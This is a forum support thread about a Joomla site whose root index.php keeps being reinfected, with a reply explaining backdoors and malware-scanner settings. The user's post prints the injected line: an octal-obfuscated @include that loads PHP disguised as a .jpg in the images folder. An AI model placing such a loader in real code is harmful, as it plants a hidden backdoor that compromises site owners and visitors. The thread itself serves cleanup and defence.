1 month 2 weeks ago #7245 by bigfishtools
Code injected into index.php was created by bigfishtools
I'm having an issue with some code being injected into the index.php file in the root. I can remove it, but it will be back in a day or two. Security Check is not showing any file changes when an integrity check is done, and it also shows no malware. Have you seen this before? The injected code is @include("\151ma\147e\163/\142a\156n\145\162s\057\143l\145a\156\145\162\056j\160g");

Here is the complete file:

<?php
/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

/**
 * Define the application's minimum supported PHP version as a constant so it can be referenced within the application.
 */
define('JOOMLA_MINIMUM_PHP', '5.3.10');

if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<'))
{
    die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!');
}

// Saves the start time and memory usage.
$startTime = microtime(1);
$startMem  = memory_get_usage();

/**
 * Constant that is checked in included files to prevent direct access.
 * define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower
 */
define('_JEXEC', 1);

if (file_exists(__DIR__ . '/defines.php'))
{
    include_once __DIR__ . '/defines.php';
}

if (!defined('_JDEFINES'))
{
    define('JPATH_BASE', __DIR__);
    require_once JPATH_BASE . '/includes/defines.php';
}

require_once JPATH_BASE . '/includes/framework.php';

// Set profiler start time and memory usage and mark afterLoad in the profiler.
JDEBUG ? JProfiler::getInstance('Application')->setStart($startTime, $startMem)->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Execute the application.
$app->execute();
1 month 2 weeks ago #7246 by Jose
Replied by Jose on topic Code injected into index.php
Hi bigfishtools,

Yes, I have seen this many times before. I clean one or two sites infected with this malware every month. There should be a backdoor somewhere that allows the attackers to inject encoded code, usually at the beginning of some mandatory files, to load the malware (or perform some actions) every time the site is visited.

But it's odd the file integrity scanner didn't show the change... maybe the original hash of the file was taken with that code, and this is why you are not alerted about it. Regarding the malware scanner, please be fully sure that it's configured to analyze the entire filesystem (Global configuration -> Malware scanner tab -> Timeline = Anytime) and also to look for suspicious patterns (Global configuration -> Malware scanner tab -> Deep scan = enabled).

If you need help cleaning the site, just tell me and I will work on it.


